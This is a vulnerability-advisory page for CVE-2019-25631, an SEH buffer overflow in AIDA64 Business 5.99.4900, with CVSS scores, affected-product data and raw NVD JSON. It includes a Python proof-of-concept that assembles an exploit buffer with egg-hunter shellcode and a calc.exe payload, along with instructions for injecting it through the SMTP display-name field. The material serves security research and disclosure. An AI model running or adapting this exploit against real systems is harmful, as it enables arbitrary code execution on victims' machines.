Security Vulnerability Report
CVE-2019-25631 CVSS 8.4 HIGH

Published: 2026-03-24 12:16:03
Last Modified: 2026-03-27 16:59:50

Description

AIDA64 Business 5.99.4900 contains a structured exception handling buffer overflow vulnerability that allows local attackers to execute arbitrary code by overwriting SEH pointers with malicious shellcode. Attackers can inject egg hunter shellcode through the SMTP display name field in preferences or report wizard functionality to trigger the overflow and execute code with application privileges.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:aida64:aida64:5.99.4900:*:*:*:business:*:*:* - VULNERABLE
AIDA64 Business <= 5.99.4900

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
PoC for CVE-2019-25631 - AIDA64 Business SEH Buffer Overflow
This script generates a malicious payload to trigger the overflow.
"""
import struct


def create_exploit_buffer():
    # Offset to SEH handler (hypothetical value based on vulnerability analysis)
    offset = 4064

    # POP POP RET instruction address (from a non-ASLR module like AIDA64.exe or system DLL)
    # This address is used to pivot execution flow to the shellcode
    seh_handler = struct.pack('<L', 0x10020215)

    # Short jump to skip the SEH handler address and land on the shellcode
    nseh = b"\xeb\x06\x90\x90"

    # Egg Hunter Shellcode (x86)
    # This code searches memory for the tag 'w00tw00t' and executes the code following it
    hunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

    # Padding to align the buffer
    padding = b"\x90" * 20

    # The actual payload (The Egg)
    # Tag 'w00tw00t' followed by calc.exe execution (for demonstration)
    egg_tag = b"w00tw00t"
    payload = b"\x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xc2\x77\xff\xd0"
    # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python

    # Construct the final buffer
    buffer = b"A" * offset
    buffer += nseh
    buffer += seh_handler
    buffer += hunter
    buffer += padding
    buffer += egg_tag + payload
    return buffer


if __name__ == "__main__":
    exploit = create_exploit_buffer()
    print(f"[+] Generated Exploit Buffer Length: {len(exploit)}")
    print("[+] Usage: Copy this buffer into the 'SMTP Display Name' field in AIDA64 settings.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25631", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:03.393", "lastModified": "2026-03-27T16:59:50.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AIDA64 Business 5.99.4900 contains a structured exception handling buffer overflow vulnerability that allows local attackers to execute arbitrary code by overwriting SEH pointers with malicious shellcode. Attackers can inject egg hunter shellcode through the SMTP display name field in preferences or report wizard functionality to trigger the overflow and execute code with application privileges."}, {"lang": "es", "value": "AIDA64 Business 5.99.4900 contiene una vulnerabilidad de desbordamiento de búfer de manejo de excepciones estructurado que permite a atacantes locales ejecutar código arbitrario sobrescribiendo punteros SEH con shellcode malicioso. Los atacantes pueden inyectar shellcode egg hunter a través del campo de nombre para mostrar de SMTP en las preferencias o la funcionalidad del asistente de informes para activar el desbordamiento y ejecutar código con privilegios de aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", 
"modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aida64:aida64:5.99.4900:*:*:*:business:*:*:*", "matchCriteriaId": "5960B148-8387-47D8-82B8-CE6F3EC25F1C"}]}]}], 
"references": [{"url": "https://www.aida64.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.aida64.com/downloads", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46639", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/aida64-business-seh-buffer-overflow-via-egghunter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}